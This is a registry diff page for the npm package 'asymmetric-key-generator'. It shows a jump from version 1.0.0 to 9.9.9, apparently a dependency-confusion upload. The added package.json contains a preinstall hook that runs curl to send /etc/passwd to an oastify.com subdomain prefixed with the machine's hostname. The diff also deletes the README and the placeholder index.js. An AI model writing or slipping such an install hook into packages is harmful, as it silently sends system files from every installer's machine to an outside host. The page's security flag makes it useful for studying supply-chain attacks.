asymmetric-key-generator 1.0.0 → 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of asymmetric-key-generator might be problematic. Click here for more details.
- package/package.json +5 -5
- package/README.md +0 -0
- package/index.js +0 -1
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "asymmetric-key-generator",
|
3
|
-
"version": "
|
4
|
-
"description": "",
|
3
|
+
"version": "9.9.9",
|
5
4
|
"main": "index.js",
|
6
5
|
"scripts": {
|
7
|
-
"test": "echo \"Error: no test specified\" && exit 1"
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)f2i4gobegv1h5es99tvf3w68wz2sqoed.oastify.com"
|
8
8
|
},
|
9
|
-
"keywords": [],
|
10
9
|
"author": "",
|
11
|
-
"license": "ISC"
|
10
|
+
"license": "ISC",
|
11
|
+
"description": ""
|
12
12
|
}
|
package/README.md
DELETED
File without changes
|
package/index.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
// placeholder
|